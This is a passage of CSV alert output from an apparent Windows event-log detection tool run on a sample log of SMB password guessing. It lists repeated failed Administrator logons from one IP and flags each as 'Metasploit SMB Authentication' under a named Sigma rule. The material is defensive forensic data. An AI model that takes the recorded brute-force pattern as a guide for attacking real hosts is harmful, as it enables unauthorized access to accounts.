Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iVep4j7jZZAOAQAj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.357 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KWWtGIQx8jBgAeoH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zn8X8gen8gX9i3QK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.427 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9OdUM99RBHzwgVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.476 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TJbBVm6wDrqyQmpZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.518 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tAVRBfMxIyrfsEtR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wuCIClZihRxRyjGF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxhpEP6nnmihvkHB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.796 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J1HYmJDrWmKjj8DF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.833 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V81dIfR2SRNDk3a2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.872 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vaZpLaxB1kcCXqHP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JRhs8IoV6R6vyCdL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.949 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4wUYds3Ym3G2abrV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:36.988 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmBfxm6pPLlSEsUI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VbAuqFggx0zz5iEn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cytpVOjb4KrNaGg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.104 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BFFFt7eFzmlzbHhG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.149 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AJQBZZiNKVGXzx4A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7gyu6EyrtbyowTfC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aASpkRuPfE8Nl64n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.267 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MSI2b7LpZpWO3xJW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.306 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: avNkOq3fsGN3yYJi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wnlgy6dW33tRk6UX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: msJ8QrqMluTeUlM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.416 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H33NuKduMuskxL0D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.464 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BHjp69CD1ttbaK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.500 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5uxByLPApvfeIhU2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.544 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6g0WOAnoGpKyEyzW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.600 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P8MTs4Nkbm3ryqcp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.640 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Nyd7tr3y0BHmPLM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: J5KiDQOEnDf6xEPN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.731 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3MBP1buuRcBRiQTG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.768 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXXdcg3MSqnGSvax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.804 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Kej7zgIDCNR5tnnp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.841 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM8SOeQXwytB6iw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.884 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XPNATM0IL05vtbZ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H56ci5gbBVzebS2j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:37.964 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6rRofLg1uxrojU7n : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.008 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MAhtwTU8OttAhcxf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CwKgAR6OWbkFlxUy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.093 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lNZR4G0DVsXVg4A9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.129 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OZG99tl0RRN3cQoK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.174 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nwRzAutxa07Y1xE4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.216 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OwhvrVBSRa8RcCKe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bLBwBys2favoK7BQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3oYpj1rGcsOWNSs7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.335 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IBogtzE6No62tJB9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 